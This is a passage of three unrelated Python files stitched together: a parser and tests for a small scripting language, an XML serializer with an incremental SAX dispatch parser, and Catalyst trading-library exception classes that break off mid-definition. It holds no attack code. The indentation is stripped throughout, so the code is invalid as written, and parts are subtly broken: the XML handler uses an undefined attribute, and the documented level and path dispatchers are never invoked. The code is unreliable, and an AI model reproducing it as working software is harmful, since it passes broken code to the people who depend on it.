if op.close_str is not None and not input_handler.match_ws(op.close_str):
raise ParseError(input_handler, "expecting: " + op.close_str)
else:
raise ParseError(input_handler, "unhandled operator")
return lhs_expr
def parse_expr(input_handler):
"""Parse an expression"""
return parse_expr_prec(input_handler, 0)
def match_op(input_handler, min_prec, pre_unary):
"""matching operators"""
ch = input_handler.peek_ch()
op = None
if ch == '(':
op = OP_CALL
elif ch == '+':
op = OP_ADD
elif ch == '-':
if pre_unary:
op = OP_NEG
else:
op = OP_SUB
elif ch == '*':
op = OP_MUL
elif ch == '/':
op = OP_DIV
elif ch == '%':
op = OP_MOD
elif ch == '<':
if input_handler.next("<="):
op = OP_LE
elif input_handler.next("<"):
op = OP_LT
elif ch == '>':
if input_handler.next(">="):
op = OP_GE
elif input_handler.next(">"):
op = OP_GT
elif ch == '=':
op = OP_EQ
elif ch == ':':
if input_handler.next(":="):
op = OP_ASSIGN
elif ch == '!':
if input_handler.next('!='):
op = OP_NE
elif ch == 'n':
if input_handler.next('not'):
op = OP_NOT
elif ch == 'o':
if input_handler.next('or'):
op = OP_OR
elif ch == 'a':
if input_handler.next('and'):
op = OP_AND
elif ch == 't':
if input_handler.next('typeof'):
op = OP_TYPEOF
if op is not None:
if op.prec < min_prec or (pre_unary and op.arity != 1) or (pre_unary and op.assoc != 'r'):
return None
assert input_handler.match(op.operator)
return op
def parse_atom(input_handler):
"""Parsing an atomic expression"""
input_handler.eat_ws()
if input_handler.peek_ch().isdigit():
return parse_num(input_handler)
if input_handler.match('"'):
return parse_string_literal(input_handler, '"')
if input_handler.match("'"):
return parse_string_literal(input_handler, "'")
if input_handler.match('['):
return ArrayExpr(parse_expr_list(input_handler, "]"))
if input_handler.match("{"):
return parse_obj_literal(input_handler)
if input_handler.match("("):
expr = parse_expr(input_handler)
input_handler.expect_ws(")")
return expr
op = match_op(input_handler, 0, True)
if op is not None:
expr = parse_expr_prec(input_handler, op.prec)
return UnOpExpr(op, expr)
if input_handler.peek_ch().isalnum():
if input_handler.match_kw("fun"):
return parse_fun_expr(input_handler)
return IdentExpr(parse_ident_expr(input_handler))
if input_handler.match("$"):
op_name = parse_ident_expr(input_handler)
input_handler.expect('(')
arg_exprs = parse_expr_list(input_handler, ')')
return IRExpr(op_name, arg_exprs)
raise ParseError(input_handler, "invalid expression")
def parse_stmt(input_handler):
"""Parse a statement"""
# eat whitespace
input_handler.eat_ws()
# a block statement
if input_handler.match("{"):
return parse_block_stmt(input_handler, "}")
# a variable statement
if input_handler.match_kw("let"):
input_handler.eat_ws()
ident = parse_ident_expr(input_handler)
input_handler.expect_ws(":=")
init_expr = parse_expr(input_handler)
input_handler.expect_ws(";")
return DeclStmt(ident, init_expr)
if input_handler.match_kw("if"):
return parse_if_stmt(input_handler)
if input_handler.match_kw("assert"):
input_handler.expect_ws("(")
test_expr = parse_expr(input_handler)
err_msg = StringExpr("assertion failed")
if input_handler.match_ws(","):
err_msg = parse_expr(input_handler)
input_handler.expect_ws(")")
input_handler.expect(";")
return IfStmt(
test_expr,
BlockStmt([]),
IRStmt("abort", [err_msg])
)
if input_handler.match_kw("return"):
if input_handler.match_ws(";"):
return ReturnStmt(IdentExpr("null"))
expr = parse_expr(input_handler)
input_handler.expect_ws(";")
return ReturnStmt(expr)
if input_handler.match_kw("import"):
input_handler.expect_ws("(")
paths = []
while True:
if input_handler.match_ws(")"):
break
if input_handler.match_ws("'"):
path = parse_string_literal(input_handler, "'")
name = None
input_handler.expect_ws("as")
input_handler.eat_ws()
name = parse_ident_expr(input_handler)
paths.append((path, name))
else:
input_handler.expect_ws('"')
path = parse_string_literal(input_handler, '"')
name = None
input_handler.expect_ws("as")
input_handler.eat_ws()
name = parse_ident_expr(input_handler)
paths.append((path, name))
if input_handler.match_ws(")"):
break
input_handler.expect_ws(",")
return ImportStmt(paths)
if input_handler.match_kw("export"):
input_handler.expect_ws("(")
names = []
while True:
if input_handler.match_ws(")"):
break
input_handler.eat_ws()
name = parse_ident_expr(input_handler)
names.append(name)
if input_handler.match_ws(")"):
break
input_handler.expect_ws(',')
return ExportStmt(names)
if input_handler.match("$"):
op_name = parse_ident_expr(input_handler)
input_handler.expect("(")
arg_exprs = parse_expr_list(input_handler, ")")
input_handler.expect_ws(";")
return IRStmt(op_name, arg_exprs)
expr = parse_expr(input_handler)
input_handler.expect_ws(";")
return ExprStmt(expr)
def parse_if_stmt(input_handler):
"""Parse an if statement"""
input_handler.expect_ws('(')
test_expr = parse_expr(input_handler)
input_handler.expect(')')
then_stmt = parse_stmt(input_handler)
else_stmt = BlockStmt([])
if input_handler.match_kw("else"):
else_stmt = parse_stmt(input_handler)
return IfStmt(test_expr, then_stmt, else_stmt)
def parse_block_stmt(input_handler, end_str):
"""Parse a block statement"""
stmts = []
while True:
input_handler.eat_ws()
if end_str == "" and input_handler.eof() or end_str != "" and input_handler.match(end_str):
break
stmt = parse_stmt(input_handler)
stmts.append(stmt)
return BlockStmt(stmts)
def parse_unit(input_handler):
"""Parse a source unit from an input_handler object"""
if input_handler.match('#language'):
input_handler.expect_ws('"')
while True:
if input_handler.eof():
raise ParseError(input_handler, "end of input_handler inside language declaration")
if input_handler.read_ch() == '"':
break
block_stmt = parse_block_stmt(input_handler, "")
return FunExpr("unit", block_stmt, [])
def parse_string(string, src_name):
"""Parse a string and returns a function"""
input_handler_handler = Input(src_name, string)
return parse_unit(input_handler_handler)
def test_parse(string):
"""Testing success"""
parse_string(string, "test success")
def test_parse_fail(string):
"""Testing failure"""
try:
parse_string(string, "test fail")
except ParseError:
return
raise Exception("Parsing did not fail for: " + string)
def test_parser():
"""Testing"""
print("parser tests")
# ids
test_parse("foo;")
test_parse(" foo ;")
test_parse(" foo;")
# literals
test_parse("42;")
test_parse("42.42f;")
test_parse("42e42f;")
test_parse("42.4e4f;")
test_parse('"test me!";')
test_parse('"test me! \'lol\'";')
test_parse("'test \\n newline';")
test_parse("true;")
test_parse("false;")
test_parse_fail("invalid \\iesc")
# arrays
test_parse("[];")
test_parse("[1,2];")
test_parse("[1,e];")
test_parse("['aa', 'bb', 4.4f];")
test_parse("[1, \n3];")
test_parse_fail("[,];")
# objects
test_parse("let a := {a:2, b:'c'};")
test_parse_fail("a := {,}")
# Comments
test_parse("1; // comment")
test_parse("[ 1//comment\n,a ];")
test_parse_fail("1; // comment\n#1")
# Unary and binary expressions
test_parse("-1;")
test_parse("-x + 2;")
test_parse("x + -1;")
test_parse("a + b;")
test_parse("a + b + c;")
test_parse("a + b - c;")
test_parse("a + b * c + d;")
test_parse("a or b or c;")
test_parse("(a);")
test_parse("(b ) ;")
test_parse("(a + b);")
test_parse("(a + (b + c));")
test_parse("((a + b) + c);")
test_parse("(a + b) * (c + d);")
test_parse_fail("*a;")
test_parse_fail("a*;")
test_parse_fail("a # b;")
test_parse_fail("a +;")
test_parse_fail("a + b # c;")
test_parse_fail("(a;")
test_parse_fail("(a + b))")
test_parse_fail("((a + b)")
# Assignment
test_parse("x := 1;")
test_parse("x := -1;")
test_parse("x := y := 1;")
test_parse("let x := 3;")
test_parse_fail("let")
test_parse_fail("var")
test_parse_fail("var x")
test_parse_fail("var x:=")
test_parse_fail("let +")
test_parse_fail("let 3")
# Call expressions
test_parse("a();")
test_parse("a(b);")
test_parse("a(b,c);")
test_parse("a(b,c+1);")
test_parse("a(b,c+1,);")
test_parse("x + a(b,c+1);")
test_parse("x + a(b,c+1) + y;")
test_parse("a(); b();")
test_parse_fail("a(b c+1);")
# package import
test_parse("import( 'package/math' as math )")
test_parse("import( 'package/math' as m )")
test_parse_fail("import( '1' as one, '2', '3' as three )")
# export statement
test_parse("export(a, b)")
test_parse("export(c)")
test_parse_fail("export(1)")
test_parse_fail("export('a')")
# Inline IR
test_parse("let s := $add_i32(1, 2);")
test_parse("$array_push(arr, val);")
# If statements
test_parse("if (true) {x + 1;}")
test_parse("if (x) {x+1;} else {y+1;}")
# Assert statement
test_parse("assert(x);")
test_parse("assert(x, 'foo');")
test_parse_fail("assert(x, 'foo', z);")
# Function expression
test_parse("fun () { return 0; }; ")
test_parse("fun (x) {return x;};")
test_parse("fun (x) { return x; };")
test_parse("fun (x,y) { return x; };")
test_parse("fun (x,y,) { return x; };")
test_parse("fun (x,y) { return x+y; };")
test_parse_fail("fun (x,y)")
# Sequence/block expression
test_parse("{ 1; 2; }")
test_parse("fun (x) { print(x); print(y); };")
test_parse("fun (x) { let y := x + 1; print(y); };")
test_parse_fail("{ a, }")
test_parse_fail("{ a, b }")
test_parse_fail("fun () { a, };")
# There is no empty statement
test_parse_fail(";")
|
|
# -*- coding: utf-8 -*-
import os
import os.path
from StringIO import StringIO
from time import time
__all__ = ['Parser', 'IncrementalParser', 'DispatchParser']
import xml.dom as xd
import xml.dom.minidom as xdm
import xml.sax as xs
import xml.sax.handler as xsh
import xml.sax.saxutils as xss
from xml.sax.saxutils import quoteattr, escape, unescape
from bridge import Element, ENCODING, Attribute, PI, Comment, Document
from bridge.common import ANY_NAMESPACE
class Parser(object):
def __init__(self):
self.buffer = []
def __deserialize_fragment(self, current, parent):
if current.attributes:
for key in iter(current.attributes.keys()):
attr = current.attributes[key]
Attribute(attr.localName, attr.value,
attr.prefix, attr.namespaceURI, parent)
children_num = len(current.childNodes)
children = iter(current.childNodes)
for child in children:
nt = child.nodeType
if nt == xd.Node.TEXT_NODE:
data = escape(child.data)
if children_num == 1:
parent.xml_text = data
else:
parent.xml_children.append(data)
elif nt == xd.Node.CDATA_SECTION_NODE:
parent.as_cdata = True
data = child.data
if children_num == 1:
parent.xml_text = data
else:
parent.xml_children.append(data)
elif nt == xd.Node.COMMENT_NODE:
Comment(data=unicode(child.data), parent=parent)
elif nt == xd.Node.PROCESSING_INSTRUCTION_NODE:
PI(target=unicode(child.target), data=unicode(child.data), parent=parent)
elif nt == xd.Node.ELEMENT_NODE:
element = Element(name=child.localName, prefix=child.prefix,
namespace=child.namespaceURI, parent=parent)
self.__deserialize_fragment(child, element)
def __qname(self, name, prefix=None):
if prefix:
return "%s:%s" % (prefix, name)
return name
def __attrs(self, node):
for attr_ns, attr_name in iter(node.xml_attributes):
if attr_ns == xd.XMLNS_NAMESPACE and attr_name == 'xmlns':
continue
attr = node.xml_attributes[(attr_ns, attr_name)]
ns = attr.xml_ns
prefix = attr.xml_prefix
name = attr.xml_name
yield ns, name, prefix, attr.xml_text or ''
def __append_namespace(self, prefix, ns):
if prefix:
self.buffer.append(' xmlns:%s="%s"' % (prefix, ns))
elif ns is not None:
self.buffer.append(' xmlns="%s"' % (ns, ))
def __build_ns_map(self, ns_map, element):
for child in element.xml_children:
if isinstance(child, Element):
if child.xml_ns not in ns_map:
ns_map[child.xml_prefix] = child.xml_ns
for attr_ns, attr_name in child.xml_attributes:
if attr_ns not in ns_map:
ns_map[attr_ns] = child.xml_attributes[(attr_ns, attr_name)].xml_prefix
def __is_known(self, ns_map, prefix, ns):
if prefix in ns_map and ns_map[prefix] == ns:
return True
ns_map[prefix] = ns
return False
def __append_text(self, text, as_cdata):
if as_cdata:
self.buffer.append('<![CDATA[')
self.buffer.append(text)
if as_cdata:
self.buffer.append(']]>')
def __serialize_element(self, element, parent_ns_map=None):
for child in iter(element.xml_children):
if isinstance(child, basestring):
child = child.strip().strip('\n').strip('\r\n')
if not child:
continue
self.__append_text(child, element.as_cdata)
elif isinstance(child, Element):
ns_map = {}
ns_map.update(parent_ns_map or {})
prefix = ns = name = None
if child.xml_prefix:
prefix = child.xml_prefix
if child.xml_ns:
ns = child.xml_ns
name = child.xml_name
qname = self.__qname(name, prefix=prefix)
self.buffer.append('<%s' % qname)
if not self.__is_known(ns_map, prefix, ns):
self.__append_namespace(prefix, ns)
for ns, name, prefix, value in self.__attrs(child):
if ns is None:
pass
elif ns == xd.XML_NAMESPACE:
name = 'xml:%s' % name
elif ns == xd.XMLNS_NAMESPACE:
if not self.__is_known(ns_map, name, value):
self.__append_namespace(name, value)
continue
else:
name = '%s:%s' % (prefix, name)
if not self.__is_known(ns_map, prefix, ns):
self.__append_namespace(prefix, ns)
self.buffer.append(' %s=%s' % (name, quoteattr(value)))
if child.xml_text or child.xml_children:
self.buffer.append('>')
if child.xml_text:
self.__append_text(child.xml_text, child.as_cdata)
if child.xml_children:
self.__serialize_element(child, ns_map)
self.buffer.append('</%s>' % (qname, ))
else:
self.buffer.append(' />')
elif isinstance(child, Comment):
self.buffer.append('<!--%s-->\n' % (child.data,))
elif isinstance(child, PI):
self.buffer.append('<?%s %s?>\n' % (child.target, child.data))
def serialize(self, document, indent=False, encoding=ENCODING, prefixes=None, omit_declaration=False):
if not isinstance(document, Document):
root = document
document = Document()
document.xml_children.append(root)
self.__serialize_element(document)
if not omit_declaration:
self.buffer.insert(0, '<?xml version="1.0" encoding="%s"?>%s' % (encoding, os.linesep))
content = ''.join(self.buffer)
self.buffer = []
if indent:
return content.rstrip(os.linesep).encode(encoding)
return content.encode(encoding)
def deserialize(self, source, prefixes=None, strict=False):
doc = None
if isinstance(source, basestring):
if os.path.exists(source):
doc = xdm.parse(source)
else:
doc = xdm.parseString(source)
elif hasattr(source, 'read'):
doc = xdm.parse(source)
document = Document()
self.__deserialize_fragment(doc, document)
if doc:
try:
doc.unlink()
except KeyError:
pass
return document
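# Usage sketch (comments only; based on the Parser class above): round-tripping
# an XML string through deserialize()/serialize() looks roughly like this:
#
#   parser = Parser()
#   doc = parser.deserialize('<root><child>text</child></root>')
#   xml_bytes = parser.serialize(doc, encoding='UTF-8')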
import xml.sax as xs
import xml.sax.saxutils as xss
from xml.parsers import expat
try:
import cStringIO as StringIO
except ImportError:
import StringIO
from time import time
class IncrementalHandler(xss.XMLGenerator):
def __init__(self, out, encoding=ENCODING):
xss.XMLGenerator.__init__(self, out, encoding)
self._root = Document()
self._current_el = self._root
self._current_level = 0
self._as_cdata = False
def reset(self):
if self._root:
self._root.forget()
self._root = None
if self._current_el:
self._current_el.forget()
self._current_el = None
self._root = Document()
self._current_el = self._root
self._current_level = 0
def startDocument(self):
self._root = Document()
self._current_el = self._root
self._current_level = 0
self._as_cdata = False
# see http://www.xml.com/pub/a/2003/03/10/python.html
def _split_qname(self, qname):
qname_split = qname.split(':')
if len(qname_split) == 2:
prefix, local = qname_split
else:
prefix = None
            local = qname_split[0]
return prefix, local
def processingInstruction(self, target, data):
PI(target, data, self._current_el)
def startElementNS(self, name, qname, attrs):
#print "$%s%s: %f" % (" " * self._current_level, name, time())
uri, local_name = name
prefix = None
if uri and uri in self._current_context:
prefix = self._current_context[uri]
#print "$$%s%s: %f" % (" " * self._current_level, name, time())
e = Element(local_name, prefix=prefix, namespace=uri, parent=self._current_el)
#print "$$$%s%s: %f" % (" " * self._current_level, name, time())
for name, value in iter(attrs.items()):
(namespace, local_name) = name
qname = attrs.getQNameByName(name)
prefix = self._split_qname(qname)[0]
Attribute(local_name, value, prefix, namespace, e)
#print "$$$$%s%s: %f" % (" " * self._current_level, name, time())
self._current_el = e
self._current_level = self._current_level + 1
#print "$$$$$%s%s: %f" % (" " * self._current_level, name, time())
def endElementNS(self, name, qname):
self._current_level = current_level = self._current_level - 1
self._current_el = self._current_el.xml_parent
def characters(self, content):
self._current_el.as_cdata = self._as_cdata
if not self._as_cdata and not self._current_el.xml_text:
self._current_el.xml_text = content
else:
self._current_el.xml_children.append(content)
self._as_cdata = False
def comment(self, data):
Comment(data, self._current_el)
def startCDATA(self):
self._as_cdata = True
def endCDATA(self):
pass
def startDTD(self, name, public_id, system_id):
pass
def endDTD(self):
pass
def doc(self):
"""Returns the root Document instance of the parsed
document. You have to call the close() method of the
parser first.
"""
return self._root
class IncrementalParser(object):
def __init__(self, out=None, encoding=ENCODING):
self.parser = xs.make_parser()
self.parser.setFeature(xs.handler.feature_namespaces, True)
if not out:
out = StringIO.StringIO()
self.out = out
self.handler = IncrementalHandler(self.out, encoding)
self.parser.setContentHandler(self.handler)
self.parser.setProperty(xs.handler.property_lexical_handler, self.handler)
def feed(self, chunk):
self.parser.feed(chunk)
def reset(self):
self.handler.reset()
self.parser.reset()
class DispatchHandler(IncrementalHandler):
def __init__(self, out, encoding='UTF-8'):
        """This handler allows the incremental parsing of an XML document
        while providing simple ways to dispatch at precise points of the
        parsing back to the caller.
        Here's an example:
        >>> from parser import DispatchParser
        >>> p = DispatchParser()
        >>> def dispatch(e):
        ... print e.xml()
        ...
        >>> p.register_at_level(1, dispatch)
        >>> p.feed('<r')
        >>> p.feed('><b')
        >>> p.feed('/></r>')
        <?xml version="1.0" encoding="UTF-8"?>
        <b xmlns=""></b>
        Alternatively this can even be used as a generic parser. If you
        don't need dispatching you simply call ``disable_dispatching``.
        >>> from parser import DispatchParser
        >>> p = DispatchParser()
        >>> p.disable_dispatching()
        >>> p.feed('<r><b/></r>')
        >>> p.handler.doc()
        <r element at 0xb7ca99ccL />
        >>> p.handler.doc().xml(omit_declaration=True)
        '<r xmlns=""><b></b></r>'
        Note that this handler has limitations as it doesn't
        manage DTDs.
        Note also that this class is not thread-safe.
        """
        IncrementalHandler.__init__(self, out=out, encoding=encoding)
self._level_dispatchers = {}
self._element_dispatchers = {}
self._element_level_dispatchers = {}
self._path_dispatchers = {}
self.default_dispatcher = None
self.default_dispatcher_start_element = None
self.disable_dispatching()
def register_default(self, handler):
self.default_dispatcher = handler
def unregister_default(self):
self.default_dispatcher = None
def register_default_start_element(self, handler):
self.default_dispatcher_start_element = handler
def unregister_default_start_element(self):
self.default_dispatcher_start_element = None
def disable_dispatching(self):
self.default_dispatcher = None
self.default_dispatcher_start_element = None
self.enable_level_dispatching = False
self.enable_element_dispatching = False
self.enable_element_by_level_dispatching = False
self.enable_dispatching_by_path = False
def enable_dispatching(self):
self.enable_level_dispatching = True
self.enable_element_dispatching = True
self.enable_element_by_level_dispatching = True
self.enable_dispatching_by_path = True
def register_at_level(self, level, dispatcher):
"""Registers a dispatcher at a given level within the
XML tree of elements being built.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``dispatcher`` is a callable object only taking
        one parameter, an Element instance.
"""
self.enable_level_dispatching = True
self._level_dispatchers[level] = dispatcher
def unregister_at_level(self, level):
"""Unregisters a dispatcher at a given level
"""
if level in self._level_dispatchers:
del self._level_dispatchers[level]
if len(self._level_dispatchers) == 0:
self.enable_level_dispatching = False
def register_on_element(self, local_name, dispatcher, namespace=None):
"""Registers a dispatcher on a given element met during
the parsing.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
        one parameter, an Element instance.
"""
self.enable_element_dispatching = True
self._element_dispatchers[(namespace, local_name)] = dispatcher
def unregister_on_element(self, local_name, namespace=None):
"""Unregisters a dispatcher for a specific element.
"""
key = (namespace, local_name)
if key in self._element_dispatchers:
del self._element_dispatchers[key]
if len(self._element_dispatchers) == 0:
self.enable_element_dispatching = False
def register_on_element_per_level(self, local_name, level, dispatcher, namespace=None):
"""Registers a dispatcher at a given level within the
XML tree of elements being built as well as for a
specific element.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
        one parameter, an Element instance.
"""
self.enable_element_by_level_dispatching = True
self._element_level_dispatchers[(level, (namespace, local_name))] = dispatcher
def unregister_on_element_per_level(self, local_name, level, namespace=None):
"""Unregisters a dispatcher at a given level for a specific
element.
"""
key = (level, (namespace, local_name))
if key in self._element_level_dispatchers:
del self._element_level_dispatchers[key]
if len(self._element_level_dispatchers) == 0:
self.enable_element_by_level_dispatching = False
def register_by_path(self, path, dispatcher):
self.enable_dispatching_by_path = True
self._path_dispatchers[path] = dispatcher
def unregister_by_path(self, path):
if path in self._path_dispatchers:
del self._path_dispatchers[path]
if len(self._path_dispatchers) == 0:
self.enable_dispatching_by_path = False
def startElementNS(self, name, qname, attrs):
#print "%s: %f" % (name, time())
IncrementalHandler.startElementNS(self, name, qname, attrs)
if self.default_dispatcher_start_element:
self.default_dispatcher_start_element(self._current_el)
def endElementNS(self, name, qname):
self._current_level = current_level = self._current_level - 1
if not self._current_el:
return
current_element = self._current_el
parent_element = self._current_el.xml_parent
dispatched = False
if self.enable_element_dispatching:
pattern = (current_element.xml_ns, current_element.xml_name)
if pattern in self._element_dispatchers:
self._element_dispatchers[pattern](current_element)
dispatched = True
if not dispatched and self.default_dispatcher:
self.default_dispatcher(current_element)
self._current_el = parent_element
class DispatchParser(object):
def __init__(self, out=None, encoding=ENCODING):
self.parser = xs.make_parser()
self.parser.setFeature(xs.handler.feature_namespaces, True)
if not out:
out = StringIO.StringIO()
self.out = out
self.handler = DispatchHandler(self.out, encoding)
self.parser.setContentHandler(self.handler)
self.parser.setProperty(xs.handler.property_lexical_handler, self.handler)
def feed(self, chunk):
self.parser.feed(chunk)
def register_default(self, handler):
self.handler.register_default(handler)
def unregister_default(self):
self.handler.unregister_default()
def register_default_start_element(self, handler):
self.handler.register_default_start_element(handler)
def unregister_default_start_element(self):
self.handler.unregister_default_start_element()
def reset(self):
self.handler.reset()
self.parser.reset()
def disable_dispatching(self):
self.handler.disable_dispatching()
def enable_dispatching(self):
self.handler.enable_dispatching()
def register_at_level(self, level, dispatcher):
"""Registers a dispatcher at a given level within the
XML tree of elements being built.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``dispatcher`` is a callable object only taking
        one parameter, an Element instance.
"""
self.handler.register_at_level(level, dispatcher)
def unregister_at_level(self, level):
"""Unregisters a dispatcher at a given level
"""
        self.handler.unregister_at_level(level)
def register_on_element(self, local_name, dispatcher, namespace=None):
"""Registers a dispatcher on a given element met during
the parsing.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
        one parameter, an Element instance.
"""
self.handler.register_on_element(local_name, dispatcher, namespace)
def unregister_on_element(self, local_name, namespace=None):
"""Unregisters a dispatcher for a specific element.
"""
self.handler.unregister_on_element(local_name, namespace)
def register_on_element_per_level(self, local_name, level, dispatcher, namespace=None):
"""Registers a dispatcher at a given level within the
XML tree of elements being built as well as for a
specific element.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
        one parameter, an Element instance.
"""
self.handler.register_on_element_per_level(local_name, level, dispatcher, namespace)
def unregister_on_element_per_level(self, local_name, level, namespace=None):
"""Unregisters a dispatcher at a given level for a specific
element.
"""
self.handler.unregister_on_element_per_level(local_name, level, namespace)
def register_by_path(self, path, dispatcher):
self.handler.register_by_path(path, dispatcher)
def unregister_by_path(self, path):
self.handler.unregister_by_path(path)
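# Usage sketch (illustrative; assumes this module is importable as `parser`
# with the ENCODING/IncrementalHandler definitions it relies on). Element
# dispatching is wired into endElementNS above, so a callback registered with
# register_on_element fires each time a matching end tag has been parsed,
# even when the document arrives in arbitrary chunks.
if __name__ == '__main__':
    p = DispatchParser()

    def on_item(element):
        # `element` is the freshly built Element; xml() serializes it.
        print(element.xml())

    p.register_on_element('item', on_item)
    for chunk in ('<root><item id="1"/>', '<item id="2"/></root>'):
        p.feed(chunk)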
|
|
import sys
import traceback
from catalyst.errors import ZiplineError
def silent_except_hook(exctype, excvalue, exctraceback):
if exctype in [PricingDataBeforeTradingError, PricingDataNotLoadedError,
SymbolNotFoundOnExchange, NoDataAvailableOnExchange,
ExchangeAuthEmpty]:
fn = traceback.extract_tb(exctraceback)[-1][0]
ln = traceback.extract_tb(exctraceback)[-1][1]
print("Error traceback: {1} (line {2})\n"
"{0.__name__}: {3}".format(exctype, fn, ln, excvalue))
else:
sys.__excepthook__(exctype, excvalue, exctraceback)
sys.excepthook = silent_except_hook
class ExchangeRequestError(ZiplineError):
msg = (
'Request failed: {error}'
).strip()
class ExchangeRequestErrorTooManyAttempts(ZiplineError):
msg = (
'Request failed: {error}, giving up after {attempts} attempts'
).strip()
class ExchangeBarDataError(ZiplineError):
msg = (
'Unable to retrieve bar data: {data_type}, ' +
'giving up after {attempts} attempts: {error}'
).strip()
class ExchangePortfolioDataError(ZiplineError):
msg = (
'Unable to retrieve portfolio data: {data_type}, ' +
'giving up after {attempts} attempts: {error}'
).strip()
class ExchangeTransactionError(ZiplineError):
msg = (
'Unable to execute transaction: {transaction_type}, ' +
'giving up after {attempts} attempts: {error}'
).strip()
class ExchangeNotFoundError(ZiplineError):
msg = (
'Exchange {exchange_name} not found. Please specify exchanges '
'supported by Catalyst and verify spelling for accuracy.'
).strip()
class ExchangeAuthNotFound(ZiplineError):
msg = (
'Please create an auth.json file containing the api token and key for '
'exchange {exchange}. Place the file here: {filename}'
).strip()
class ExchangeAuthEmpty(ZiplineError):
msg = (
'Please enter your API token key and secret for exchange {exchange} '
'in the following file: {filename}'
).strip()
class RemoteAuthEmpty(ZiplineError):
msg = (
'Please enter your API token key and secret for the remote server '
'in the following file: {filename}'
).strip()
class ExchangeSymbolsNotFound(ZiplineError):
msg = (
'Unable to download or find a local copy of symbols.json for exchange '
'{exchange}. The file should be here: {filename}'
).strip()
class AlgoPickleNotFound(ZiplineError):
msg = (
'Pickle not found for algo {algo} in path {filename}'
).strip()
class InvalidHistoryFrequencyAlias(ZiplineError):
msg = (
'Invalid frequency alias {freq}. Valid suffixes are M (minute) '
'and D (day). For example, these aliases would be valid '
'1M, 5M, 1D.'
).strip()
class InvalidHistoryFrequencyError(ZiplineError):
msg = (
'Frequency {frequency} not supported by the exchange.'
).strip()
class UnsupportedHistoryFrequencyError(ZiplineError):
msg = (
'{exchange} does not support candle frequency {freq}, please choose '
'from: {freqs}.'
).strip()
class InvalidHistoryTimeframeError(ZiplineError):
msg = (
'CCXT timeframe {timeframe} not supported by the exchange.'
).strip()
class MismatchingFrequencyError(ZiplineError):
msg = (
'Bar aggregate frequency {frequency} not compatible with '
'data frequency {data_frequency}.'
).strip()
class InvalidSymbolError(ZiplineError):
msg = (
'Invalid trading pair symbol: {symbol}. '
'Catalyst symbols must follow this convention: '
'[Base Currency]_[Quote Currency]. For example: eth_usd, btc_usd, '
'neo_eth, ubq_btc. Error details: {error}'
).strip()
class InvalidOrderStyle(ZiplineError):
msg = (
'Order style {style} not supported by exchange {exchange}.'
).strip()
class CreateOrderError(ZiplineError):
msg = (
'Unable to create order on exchange {exchange} {error}.'
).strip()
class OrderNotFound(ZiplineError):
msg = (
'Order {order_id} not found on exchange {exchange}.'
).strip()
class OrphanOrderError(ZiplineError):
msg = (
'Order {order_id} found in exchange {exchange} but not tracked by '
'the algorithm.'
).strip()
class OrphanOrderReverseError(ZiplineError):
msg = (
'Order {order_id} tracked by algorithm, but not found in exchange '
'{exchange}.'
).strip()
class OrderCancelError(ZiplineError):
msg = (
'Unable to cancel order {order_id} on exchange {exchange} {error}.'
).strip()
class SidHashError(ZiplineError):
msg = (
'Unable to hash sid from symbol {symbol}.'
).strip()
class QuoteCurrencyNotFoundError(ZiplineError):
msg = (
'Algorithm quote currency {quote_currency} not found in account '
'balances on {exchange}: {balances}'
).strip()
class MismatchingQuoteCurrencies(ZiplineError):
msg = (
'Unable to trade with quote currency {quote_currency} when the '
'algorithm uses {algo_currency}.'
).strip()
class MismatchingQuoteCurrenciesExchanges(ZiplineError):
msg = (
'Unable to trade with quote currency {quote_currency} when the '
        'exchange {exchange_name} uses {exchange_currency}.'
).strip()
class SymbolNotFoundOnExchange(ZiplineError):
"""
Raised when a symbol() call contains a non-existent symbol.
"""
msg = ('Symbol {symbol} not found on exchange {exchange}. '
'Choose from: {supported_symbols}').strip()
class BundleNotFoundError(ZiplineError):
    msg = ('Unable to find bundle data for exchange {exchange} and '
           'data frequency {data_frequency}. '
           'Please ingest some price data. '
           'See `catalyst ingest-exchange --help` for details.').strip()
class TempBundleNotFoundError(ZiplineError):
msg = ('Temporary bundle not found in: {path}.').strip()
class EmptyValuesInBundleError(ZiplineError):
msg = ('{name} with end minute {end_minute} has empty rows '
'in ranges: {dates}').strip()
class PricingDataBeforeTradingError(ZiplineError):
msg = ('Pricing data for trading pairs {symbols} on exchange {exchange} '
'starts on {first_trading_day}, but you are either trying to trade '
'or retrieve pricing data on {dt}. Adjust your dates accordingly.'
).strip()
class PricingDataNotLoadedError(ZiplineError):
msg = ('Missing data for {exchange} {symbols} in date range '
'[{start_dt} - {end_dt}]'
'\nPlease run: `catalyst ingest-exchange -x {exchange} -f '
'{data_frequency} -i {symbol_list}`. See catalyst documentation '
'for details.').strip()
class PricingDataValueError(ZiplineError):
msg = ('Unable to retrieve pricing data for {exchange} {symbol} '
'[{start_dt} - {end_dt}]: {error}').strip()
class DataCorruptionError(ZiplineError):
msg = (
'Unable to validate data for {exchange} {symbols} in date range '
'[{start_dt} - {end_dt}]. The data is either corrupted or '
'unavailable. Please try deleting this bundle:'
        '\n`catalyst clean-exchange -x {exchange}`\n'
'Then, ingest the data again. Please contact the Catalyst team if '
'the issue persists.'
).strip()
class ApiCandlesError(ZiplineError):
msg = (
'Unable to fetch candles from the remote API: {error}.'
).strip()
class NoDataAvailableOnExchange(ZiplineError):
msg = (
'Requested data for trading pair {symbol} is not available on '
'exchange {exchange} '
'in `{data_frequency}` frequency at this time. '
'Check `http://enigma.co/catalyst/status` for market coverage.'
).strip()
class NoValueForField(ZiplineError):
msg = (
'Value not found for field: {field}.'
).strip()
class OrderTypeNotSupported(ZiplineError):
msg = (
'Order type `{order_type}` currently not supported by Catalyst. '
'Please use `limit` or `market` orders only.'
).strip()
class NotEnoughCapitalError(ZiplineError):
msg = (
'Not enough capital on exchange {exchange} for trading. Each '
'exchange should contain at least as much {quote_currency} '
